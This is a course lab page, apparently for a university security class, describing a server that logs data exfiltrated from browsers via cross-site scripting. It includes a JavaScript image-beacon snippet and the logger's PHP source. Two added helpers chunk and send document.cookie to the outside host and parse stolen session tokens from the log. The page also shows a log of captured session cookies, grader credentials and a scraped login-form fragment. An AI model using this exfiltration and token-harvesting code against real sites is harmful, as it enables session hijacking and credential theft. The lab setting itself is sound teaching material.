Lab 4 Logging Script

You can use this server-side script to collect data exfiltrated from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored by the server, but its changing value ensures that the browser bypasses its cache when downloading the image (a repeated, identical URL might otherwise never be requested again). We suggest that you use the random argument in your scripts as well. The ID argument helps you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Both arguments travel in the query string, so URL-encode anything that might contain characters such as &, #, = or spaces (encodeURIComponent in JavaScript): an unencoded # in a stolen cookie value, for instance, is treated by the browser as a URL fragment and never sent to the server. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
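As an added example (not code from the lab page), the helper below wraps the image technique shown above. It assumes the server behaviour visible in this page's PHP source: id and payload must be non-empty and at most 1000 bytes, and a payload string identical to one sent in the last 5 seconds is refused with HTTP 429. The function names buildLogUrl, chunkPayload and exfiltrate are invented for this example.

```javascript
// Added example, not part of the lab page. Assumes the server limits shown in
// the page's PHP source: 1000-byte id/payload limit and a 5-second duplicate
// filter keyed on the exact payload string.
const LOG_URL = 'https://css.csail.mit.edu/6.566/2024/labs/log.php';
const MAX_BYTES = 1000;

// Build one log.php request URL. encodeURIComponent is what keeps a value such
// as "PyZoobarLogin=user123#abc" intact: an unencoded '#' would be parsed as a
// URL fragment and never sent, and an unencoded '&' would split the payload
// into a second query parameter. The nonce argument exists so the function is
// deterministic under test; callers normally leave it undefined.
function buildLogUrl(id, payload, nonce = Math.random()) {
  return LOG_URL +
    '?id=' + encodeURIComponent(id) +
    '&payload=' + encodeURIComponent(payload) +
    '&random=' + nonce;
}

// Split a long payload into numbered pieces that each fit the 1000-byte limit.
// The "i/n:" prefix makes every piece a distinct string, which matters because
// the server's 5-second duplicate filter looks only at the payload (the random
// parameter does not make a repeat distinct). Sizes are measured in UTF-8
// bytes, which is what strlen() counts on the server.
function chunkPayload(payload, maxBytes = MAX_BYTES) {
  const enc = new TextEncoder();
  const budget = maxBytes - 12;            // room for a prefix like "12/34:"
  const pieces = [];
  let current = '';
  for (const ch of payload) {
    if (enc.encode(current + ch).length > budget) {
      pieces.push(current);
      current = '';
    }
    current += ch;
  }
  if (current.length > 0) pieces.push(current);
  if (pieces.length <= 1) return pieces;   // short payload: send as-is
  return pieces.map((p, i) => `${i + 1}/${pieces.length}:${p}`);
}

// Fire-and-forget exfiltration with the Image technique: the browser issues one
// GET per URL and the response body is irrelevant. Outside a browser (no Image
// constructor, e.g. Node) nothing is sent and the URLs are simply returned.
function exfiltrate(id, payload) {
  const urls = chunkPayload(payload).map(p => buildLogUrl(id, p));
  if (typeof Image !== 'undefined') {
    urls.forEach(u => { (new Image()).src = u; });
  }
  return urls;
}

// Typical use from an injected script: exfiltrate('my-username', document.cookie);
```

In an injected script you would call exfiltrate('my-username', document.cookie); the returned URL list is only of interest when reassembling chunked payloads from the log, where each piece's "i/n:" prefix gives its position.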

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)

ID: (some identifier to locate your payload in the log)
Payload: (the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Sun, 17 May 2026 14:23:39 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:23:26 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:22:03 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:20:59 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:20:40 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:17:03 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:08:42 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:07:56 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:06:56 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:06:42 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:05:47 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 14:03:20 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 13:55:42 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04
Sun, 17 May 2026 13:54:18 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8
Sun, 17 May 2026 13:49:02 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8
Sun, 17 May 2026 13:44:16 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8
Sun, 17 May 2026 13:42:53 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8
Sun, 17 May 2026 13:42:13 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8
Sun, 17 May 2026 13:33:49 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8
Sun, 17 May 2026 13:27:26 +0000: ruf232: some-string123
Fri, 15 May 2026 00:55:56 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:53:03 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:52:46 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:51:40 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:51:33 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:51:26 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:49:48 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:43:26 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:42:13 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554
Fri, 15 May 2026 00:39:53 +0000: ruf: some-string3554
Fri, 15 May 2026 00:32:34 +0000: my-username: some-string
Thu, 14 May 2026 23:08:59 +0000: admin456: admin
Thu, 14 May 2026 23:04:06 +0000: admin456: admin/admin
Thu, 14 May 2026 23:01:57 +0000: admin456: admin/admin
Thu, 14 May 2026 22:54:55 +0000: admin123: ></td>.</tr>.<tr>.   <td>Password:</td>.  <td colspan=2><input type=
Thu, 14 May 2026 22:43:26 +0000: admin123: PyZoobarLogin=admin#409348896458d1141009f4ab77e6ca494e2bdd899c28b659aaae3c63caedc423
Thu, 14 May 2026 22:42:56 +0000: admin123: PyZoobarLogin=admin#409348896458d1141009f4ab77e6ca494e2bdd899c28b659aaae3c63caedc423
Thu, 14 May 2026 22:40:17 +0000: admin123: PyZoobarLogin=admin#409348896458d1141009f4ab77e6ca494e2bdd899c28b659aaae3c63caedc423
Thu, 14 May 2026 07:56:10 +0000: ZhangHX: grader/TFUVBDHTNXFM
Thu, 14 May 2026 07:55:59 +0000: ZhangHX: grader/PKVVVREVZEUR
Thu, 14 May 2026 07:55:53 +0000: ZhangHX: grader/HGJDMQQCLBNG
Thu, 14 May 2026 07:55:31 +0000: ZhangHX: PyZoobarLogin=grader#2e8f3b1bcf3558cd957bd7fd5e73f171cb5466c00261128053e592cb5d5d4bfc
Thu, 14 May 2026 07:55:25 +0000: ZhangHX: PyZoobarLogin=grader#f361ff112a494f596d652af44b81cfd5266921a1d6e4bb85394224365202df16
Thu, 14 May 2026 07:55:11 +0000: ZhangHX: PyZoobarLogin=grader#411906a8d87bb306689484d1c59a28fbea277266adf99b0a1584fd6ea814c829
Thu, 14 May 2026 07:52:20 +0000: ZhangHX: grader/PSYEYRITXPCV
Thu, 14 May 2026 07:52:15 +0000: ZhangHX: grader/JCBJREJHJTPJ
Thu, 14 May 2026 07:51:56 +0000: ZhangHX: PyZoobarLogin=grader#2aba838a94d0706b4c97c9ffe3502534e4d5265e2a4d52196df5d8ced2a5f362
Thu, 14 May 2026 07:51:49 +0000: ZhangHX: PyZoobarLogin=grader#d881159601643cdc1f67ae681b5bf230fd3edb9d0dce52d99eda04d85c5cf8dc
Thu, 14 May 2026 07:51:38 +0000: ZhangHX: PyZoobarLogin=grader#ad4fbe0a6acb5010fbb510de2027e070c8b1a93a901564644a7898dfee5b72ad
Thu, 14 May 2026 07:41:47 +0000: ZhangHX: grader/CGBBBFFXBMJL
Thu, 14 May 2026 07:41:41 +0000: ZhangHX: grader/XZIFJQGFAVOR
Thu, 14 May 2026 07:41:25 +0000: ZhangHX: PyZoobarLogin=grader#311508c26a69c5ad53e602a02f79e14494c20e1503b6af4200bc6b83dee3887d
Thu, 14 May 2026 07:41:18 +0000: ZhangHX: PyZoobarLogin=grader#a442b17b903bfb1efbbfc15d40615be405c72c020c5baaa31cffb90ae1572787
Thu, 14 May 2026 07:41:05 +0000: ZhangHX: PyZoobarLogin=grader#f382e8dd7224882323ba693c8de5a1642b60d2ce6875c7f791179127775dc275
Thu, 14 May 2026 07:34:09 +0000: ZhangHX: grader/BAPLIZBYANMF
Thu, 14 May 2026 07:33:51 +0000: ZhangHX: PyZoobarLogin=grader#94cd01c89a6c0662b9d958a3303895961d39b1598249f5a61cc8b6a0b996de7c
Thu, 14 May 2026 07:33:45 +0000: ZhangHX: PyZoobarLogin=grader#134d868652eff2cc554ecb411b33fd36d4a34ef7f42341a24f3bbfd5712479ef
Thu, 14 May 2026 07:33:31 +0000: ZhangHX: PyZoobarLogin=grader#0db86660228b15a564f1b60102906b66c2e7013b3ddf472f6e78c5aa66709710
Thu, 14 May 2026 07:25:01 +0000: ZhangHX: grader/DOKZNEGAWYRI
Thu, 14 May 2026 07:24:34 +0000: ZhangHX: PyZoobarLogin=grader#d832e51b6147aef1da324155d470a210a59c2fcb97295fbd213dec1dd55ace70
Thu, 14 May 2026 07:24:27 +0000: ZhangHX: PyZoobarLogin=grader#b377f1c792d9417704235b1a4eee50bd2d9fd761968d2f1d177adc58137f9c49
Thu, 14 May 2026 07:24:14 +0000: ZhangHX: PyZoobarLogin=grader#a763a4a89a594f440ed1a9899bc118a08c7b5c5241b146cba0e763c666219b90
Thu, 14 May 2026 07:15:12 +0000: ZhangHX: grader/QFHUCYPLZJHZ
Thu, 14 May 2026 07:14:45 +0000: ZhangHX: PyZoobarLogin=grader#740c0a04fb7b9ee7ab9a67b09c4c970aaecca952bea3cd0bb08a4f21d5650a37
Thu, 14 May 2026 07:14:38 +0000: ZhangHX: PyZoobarLogin=grader#7dcd57e853b96c6f6b876435de0e518770b54cabbde86f8310cefa750cd059d1
Thu, 14 May 2026 07:14:25 +0000: ZhangHX: PyZoobarLogin=grader#818a3edc24f4475539e5292a888247b8bc40eae1e06d7c89c20155b17320504f
Thu, 14 May 2026 07:07:09 +0000: ZhangHX: grader/WUUGKEURMIGP
Thu, 14 May 2026 07:06:41 +0000: ZhangHX: PyZoobarLogin=grader#48eb36995697b7739bd508284fc9e9e74017ae70e9dda32fde5bc9be1955103f
Thu, 14 May 2026 07:06:35 +0000: ZhangHX: PyZoobarLogin=grader#8e4187182f1e772289f07a780b4529429f0bcea1fecef786374ad69ac68d8e1b
Thu, 14 May 2026 07:06:22 +0000: ZhangHX: PyZoobarLogin=grader#949dfc86fd51807c0ab08823b174c64518534c2f89ae76e9471e8ec258ee7905
Thu, 14 May 2026 06:38:08 +0000: ZhangHX: grader/BVZCPXXAUEFW
Thu, 14 May 2026 06:38:03 +0000: ZhangHX: grader/IYORWDFXUILK
Thu, 14 May 2026 06:37:41 +0000: ZhangHX: PyZoobarLogin=grader#7af81dfac24fe9949f795de6bb1f801dcf818cf2d1e76a272d71b81d21b44dd6
Thu, 14 May 2026 06:37:35 +0000: ZhangHX: PyZoobarLogin=grader#da20712941abf2a3aab15081098bacbaaa24f134d2a45fd26c880eb6dd57ecb9
Thu, 14 May 2026 06:37:23 +0000: ZhangHX: PyZoobarLogin=grader#d7b80c5e60790501b1695234c3f672c3daa7d810d7076f23eee43989ab4dc8cc
Thu, 14 May 2026 06:29:01 +0000: ZhangHX: PyZoobarLogin=grader#d71dae4a54bfcb26939266454c1a05d7a373e9183eb11fa69f7fba54184a8f93
Thu, 14 May 2026 06:28:55 +0000: ZhangHX: PyZoobarLogin=grader#5a16d65c24a5ce5d333a1df2abcd022d6530735b263197ee151be41cc3ade2f9
Thu, 14 May 2026 06:28:43 +0000: ZhangHX: PyZoobarLogin=grader#8cad6cac13d91d33c76290e361757328ff0e6275f4d22d17048962de4966bff7
Wed, 13 May 2026 17:06:11 +0000: ZhangHX: grader/RETFBWCWNQJE
Wed, 13 May 2026 17:05:46 +0000: ZhangHX: PyZoobarLogin=grader#0300d531e1c36f6fbc4728812e08b4ffe67290105d6b04b833369f4b66332d4f
Wed, 13 May 2026 17:05:39 +0000: ZhangHX: PyZoobarLogin=grader#4fd91b23e49dd6a4ce714eaf6c85c0f8c1399eab89e1974d395d3e042d400239
Wed, 13 May 2026 17:05:28 +0000: ZhangHX: PyZoobarLogin=grader#925dd4d13add6986b2eb6df08f3f37012987f2ba30a173733dbb26456b4343a9
Wed, 13 May 2026 16:36:35 +0000: ZhangHX: 123/456
Wed, 13 May 2026 16:31:21 +0000: ZhangHX: PyZoobarLogin=grader#7eefca39d70804f861514907466dda2669655c823b2cf2cd1dceecc002e52545
Wed, 13 May 2026 16:31:14 +0000: ZhangHX: PyZoobarLogin=grader#d773068a3535df95677053df8c37c9598abcbb398707844ab12cd0d46c7fee99
Wed, 13 May 2026 16:31:02 +0000: ZhangHX: PyZoobarLogin=grader#416cc218b8e47634db63eb8aaab37d414b618bab6f763867e3f2c3e443516915
Wed, 13 May 2026 16:13:17 +0000: ZhangHX: 111
Wed, 13 May 2026 15:50:36 +0000: 2222: 3333
Wed, 13 May 2026 15:46:02 +0000: ZhangHX: PyZoobarLogin=grader#1500ad8cb28f897fc7db7aea227b74b797e7fca093a6da74cf8f8447167a954c
Wed, 13 May 2026 15:26:02 +0000: ZhangHX: PyZoobarLogin=grader#111390f6cc7b9a881a1227231cf4691d473e416938126713589c44097d6e040b
Wed, 13 May 2026 15:25:56 +0000: ZhangHX: PyZoobarLogin=grader#2f6a267eb7bbe70c1ebd08749aff17002b27d22e47dd0a38724aff118bdf8243
Wed, 13 May 2026 15:25:43 +0000: ZhangHX: PyZoobarLogin=grader#58c996d989988ba276b39ccc6cddb7d8a37613217b3f12b5294ba183e195f764
Wed, 13 May 2026 15:24:27 +0000: ZhangHX: PyZoobarLogin=grader#ee50df51af4b5dfc7a42f5cc34558a805350d2a5d22f58602f68a6263bdcebad
Wed, 13 May 2026 15:24:20 +0000: ZhangHX: PyZoobarLogin=grader#ccf6d13e39ac37faad387b4c1d75a0179adc8b1b9171f8289badd3502e7bba1a
Wed, 13 May 2026 15:24:07 +0000: ZhangHX: PyZoobarLogin=grader#85b6a0366984618f7e87e15f449462a37c782210d8a8ad8f45646e30e8ca0037
Wed, 13 May 2026 15:22:26 +0000: ZhangHX: PyZoobarLogin=grader#91cb8af14547a79bf646e13b03d02593b76fc6227b077de16580d51f4ed880b0
Wed, 13 May 2026 15:22:20 +0000: ZhangHX: PyZoobarLogin=grader#805a490abdf3ed557f25c82e219b27c4ae8236cf1980fad980d5fddb8f8f3b65
Wed, 13 May 2026 15:22:09 +0000: ZhangHX: PyZoobarLogin=grader#beb062cbfaa8ee62aa0bbdc52cd4ada3f83f73a579a10eb6558b2cc53aa3c4e3
Wed, 13 May 2026 15:04:30 +0000: ZhangHX: PyZoobarLogin=grader#3c106d233c6f9d58c941fc7e21e440302b677aa4721e26613867324e5ddb9b73
Wed, 13 May 2026 15:04:24 +0000: ZhangHX: PyZoobarLogin=grader#44ca7a4ef9a66eec0ff5e51a385fb123d6a43b1480eb9eacf938ac07ca65aae2
Wed, 13 May 2026 15:04:10 +0000: ZhangHX: PyZoobarLogin=grader#dbf97465d59b506a450a96517d7af371a057b386c4e5e2ff3103f4bccea61408
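As an added example (not code from the lab page), here is a small parser for the listing above, so that "did my attack work?" can be checked programmatically rather than by eye. It relies only on the line format visible in this page's PHP source (RFC 2822 date, id and payload joined by ": ", newest entry first, CR/LF rewritten to '.'). The sample lines are copied from the listing above except the last one, which is constructed to show a payload that itself contains ": "; the function names and the 64-hex-digit pattern for the PyZoobarLogin value are assumptions made for this example.

```javascript
// Added example, not part of the lab page. Line format taken from the PHP
// source below: date(DATE_RFC2822) . ": " . $id . ": " . $payload, newest first.

// An RFC 2822 date never contains ": ", so the first two occurrences delimit
// date and id; everything after the second is the payload, which may itself
// contain ": ". Returns null for lines that do not match.
function parseLogLine(line) {
  const first = line.indexOf(': ');
  if (first < 0) return null;
  const second = line.indexOf(': ', first + 2);
  if (second < 0) return null;
  return {
    date: line.slice(0, first),
    id: line.slice(first + 2, second),
    payload: line.slice(second + 2),
  };
}

// All entries logged under one id, in the order the server wrote them (newest first).
function entriesFor(logText, id) {
  return logText.split('\n')
    .filter(l => l.trim().length > 0)
    .map(parseLogLine)
    .filter(e => e !== null && e.id === id);
}

// Distinct payloads for an id, newest first; repeated exfiltrations collapse to one.
function distinctPayloads(logText, id) {
  const seen = new Set();
  const out = [];
  for (const e of entriesFor(logText, id)) {
    if (!seen.has(e.payload)) { seen.add(e.payload); out.push(e.payload); }
  }
  return out;
}

// The stolen cookies in the listing have the shape PyZoobarLogin=<user>#<64 hex digits>.
// Pull the two parts out of a payload, or return null if the pattern is absent.
function extractZoobarLogin(payload) {
  const m = /PyZoobarLogin=([^#;\s]+)#([0-9a-f]{64})/.exec(payload);
  return m ? { user: m[1], token: m[2] } : null;
}

// Sample input: four lines copied from the listing above plus one constructed
// line (id "ruf", payload "k: v") to exercise a payload containing ": ".
const SAMPLE_LOG = [
  'Sun, 17 May 2026 14:23:39 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04',
  'Sun, 17 May 2026 13:54:18 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8',
  'Sun, 17 May 2026 13:27:26 +0000: ruf232: some-string123',
  'Thu, 14 May 2026 22:54:55 +0000: admin123: ></td>.</tr>.<tr>.   <td>Password:</td>.  <td colspan=2><input type=',
  'Fri, 15 May 2026 00:39:53 +0000: ruf: k: v',
].join('\n');

// Example query: the most recent cookie logged under id "ruf232".
function newestZoobarLogin(logText, id) {
  for (const p of distinctPayloads(logText, id)) {
    const hit = extractZoobarLogin(p);
    if (hit) return hit;
  }
  return null;
}
```

Run against the real listing, newestZoobarLogin(text, 'your-id') returns the most recently captured session value for your id, or null if nothing matching arrived.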

Source code

In case you are curious, here is the source code of this page.

<?php
// Let cross-origin callers (fetch/XMLHttpRequest from another origin) read the
// response; the <img> technique needs no CORS at all.
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    // Note: empty() also rejects the one-character payload "0".
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    // apcu_add() succeeds only if the key is not already cached, so the payload
    // string itself acts as a 5-second duplicate filter. The key is the payload
    // alone: neither id nor random makes a repeat distinct, and the same
    // payload sent by two different clients within 5 seconds collides.
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    // Keep every entry on one line: CR/LF inside the id or payload become '.'.
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2024-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    // Rotate in place: keep the new entry plus at most the 100 most recent
    // existing ones, newest first. fgets() returns false at EOF; skip it.
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $line = fgets($file);
        if ($line !== false) {
            $lines[] = $line;
        }
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as $line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
        </form>

        <h2>Logged entries</h2>
        <p>
            Below are the most recent logged entries, so that you can check
            if your attack worked:
        </p>

        <pre class="tty"><?php
            $lines = file_get_contents("/tmp/6.566-2024-logger.txt");
            echo htmlspecialchars($lines);
        ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>